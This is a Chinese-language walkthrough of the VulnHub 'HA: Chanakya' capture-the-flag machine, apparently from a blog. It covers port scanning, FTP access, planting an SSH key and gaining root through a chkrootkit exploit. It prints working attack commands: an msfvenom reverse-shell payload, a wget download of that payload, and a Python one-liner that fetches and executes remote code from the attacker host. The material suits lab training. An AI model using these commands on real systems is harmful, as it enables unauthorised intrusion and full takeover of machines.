仅供个人娱乐

参考http://www.saulgoodman.cn/HA-Chanakya.html

靶机信息

https://www.vulnhub.com/entry/ha-chanakya,395/

一、主机探测

arp-scan -l

nmap -sV -p 1-65535 -A 192.168.236.136

dirb http://192.168.236.136

二、漏洞的查找和利用

百度   得到ROT13的加密方式

pcap流量包,直接下载即可

ashoka                             kautilya

首先进行21端口登录

22端口登陆失败

创建ssh-keygen

上传.ssh 使用kali免密登录

ssh-keygen

然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中

root@kali:~/桌面# cd ~/.ssh

root@kali:~/.ssh# cat id_rsa.pub > authorized_keys

mkdir .ssh

cd.ssh

put authorized_keys

root@kali:~/.ssh# ssh ashoka@192.168.236.136

提权

先msf生成一个木马反弹一个meterpreter回话过来

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf

python -m SimpleHTTPServer

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.236.129

cd /tmp

wget http://192.168.236.129:8000/shell.elf

sysinfo

使用post模块来查看可以利用那些提权exploit:

run post/multi/recon/local_exploit_suggester

info exploit/linux/local/netfilter_priv_esc_ipv4

失败

使用命令注入来反弹一个shell:

use exploit/multi/script/web_delivery

set lhost 192.168.236.129

python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.236.129:8080/m9eTnBmiM');exec(r.read());"

在目标机运行:

使用rootkit攻击模块:

这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。

set rhosts 192.168.236.136

set session 1

set lport 8888

exploit

python -c'import pty;pty.spawn("/bin/bash")'

参考文章http://www.saulgoodman.cn/HA-Chanakya.html

chanakya的更多相关文章

  1. VulnHub靶场学习_HA: Chanakya

    HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...

  2. HA: Chanakya Vulnhub Walkthrough

    靶机链接: https://www.vulnhub.com/entry/ha-chanakya,395/ 网络主机探测: 主机端口扫描: nmap -p- -sC -sV 10.10.202.136 ...

随机推荐

  1. Linux 命令行查看etcd v2所有的Key

    etcd 是一个树型的数据结构,这样看所有的key: curl localhost:2379/v2/keys 这样看某个key的内容: curl localhost:2379/v2/keys/key ...

  2. 5、SpringBoot整合之SpringBoot整合MybatisPlus

    SpringBoot整合MybatisPlus 目录(可点击直接跳转,但还是建议按照顺序观看,四部分具有一定的关联性): 实现基础的增删改查 实现自动填充功能 实现逻辑删除 实现分页 首先给出四部分完 ...

  3. sed 大括号 sed {} 的作用详解

    今天看别人写的脚本的时候,看到了sed  -r   {}   我看网上对于这个的记录比较少,所以就写了这篇随笔. 先看一下效果 cat  test.txt image: qqq/www/eee:TAG ...

  4. Rsync+Sersync数据实时同步(双向)

    Rsync+Sersync数据实时同步(双向) 服务介绍 一.为什么要用rsync+sersync架构? 1.sersync是基于inotify开发的,类似于inotify-tools的工具 2.se ...

  5. 包机制与javaDOC文档

    包机制 包的本质就是个文件夹: 一般利用公司域名倒置作为包名:com.kuangstudy.biog javaDOC文档 package com.kuang.base; /** * @author K ...

  6. JAVA 类修饰符

    JAVA类的修饰符主要有public,default,protected,private,final,abstract,static 其中外部类中用到的只有public,final,abstract或 ...

  7. linux 退出状态码

    状态码 描述 0 命令成功结束 1 一般性未知错误 2 不适合的shell 命令 123 命令不可执行 127 没找到命令 128 无效退出参数 128+x 与linux信号x相关的严重错误 130 ...

  8. buu Youngter-drive

    一.查壳,发现是upx的壳,用自解压方式,脱下壳 二.之后发现打不开了,应该是要修复,不想修复了,直接拖入ida 找到关键函数,中间发生一点小插曲,发现堆栈不平衡,然后导致F5反编译失败,百度了下是A ...

  9. ESP32音频输入-MAX4466,MAX9814,SPH0645LM4H,INMP441(翻译)

    有几种方法可以将模拟音频数据输入到ESP32中. 直接从内置的模数转换器(ADC)读取 这对于一次性读取很有用,但不适用于高采样率. 使用I2S通过DMA读取内置ADC 适用于模拟麦克风,例如MAX4 ...

  10. Quzrtz.net 示例

    //框架.Net Core 2.0//先用Nuget 安装最新quartz.net using System; using Quartz; using Quartz.Impl; using Syste ...